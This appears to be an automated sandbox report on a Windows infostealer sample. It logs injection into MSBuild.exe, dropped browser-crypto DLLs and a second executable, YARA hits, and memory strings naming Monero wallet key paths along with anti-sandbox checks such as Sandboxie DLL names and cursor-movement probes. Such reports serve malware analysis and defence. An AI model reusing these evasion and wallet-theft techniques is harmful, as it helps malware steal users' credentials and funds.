Source: C:\ProgramData\GCGHCBKFCF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: pcacli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ntshrui.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: linkinfo.dll
Source: C:\ProgramData\GCGHCBKFCF.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2500700972.0000000035EBC000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2495526270.0000000029FDE000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00418A63 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00418A63
Source: sql[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.1.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: softokn3[1].dll.1.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.1.dr Static PE information: section name: .00cfg
Source: freebl3.dll.1.dr Static PE information: section name: .00cfg
Source: mozglue.dll.1.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.1.dr Static PE information: section name: .didat
Source: softokn3.dll.1.dr Static PE information: section name: .00cfg
Source: nss3.dll.1.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060713A push ecx; ret 0_2_0060714D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005B71C1 push ecx; ret 0_2_005B71D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006072D8 push ds; retn 0003h 0_2_0060738D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0060739E push ds; retn 0003h 0_2_0060738D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00607454 push ds; retf 0003h 0_2_00607455
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00600911 push 3BFFFFFFh; retf 0_2_00600916
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006099ED push 0000004Ch; iretd 0_2_006099FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005F5DAD push ecx; ret 0_2_005F5DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042F262 push ecx; ret 1_2_0042F275
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00422E59 push esi; ret 1_2_00422E5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041DED5 push ecx; ret 1_2_0041DEE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00432715 push 0000004Ch; iretd 1_2_00432726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CADB536 push ecx; ret 1_2_6CADB549
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003071C1 push ecx; ret 8_2_003071D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\GCGHCBKFCF.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: Yara match File source: 1.2.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5d8ad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.5b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7032, type: MEMORYSTR
Source: c:\users\user\desktop\file.exe Event Logs and Signature results: Application crash and keyboard check
Source: file.exe, MSBuild.exe Binary or memory string: DIR_WATCH.DLL
Source: file.exe, MSBuild.exe Binary or memory string: SBIEDLL.DLL
Source: file.exe, MSBuild.exe Binary or memory string: API_LOG.DLL
Source: MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:07:4116:07:4116:07:4116:07:4116:07:4116:07:41DELAYS.TMP%S%SNTDLL.DLL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos, 1_2_0040180D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sql[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 1.5 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 9.8 %
Source: C:\ProgramData\GCGHCBKFCF.exe API coverage: 1.5 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 6644 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6256 Thread sleep count: 87 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh 1_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C73FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_005C73FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF4D
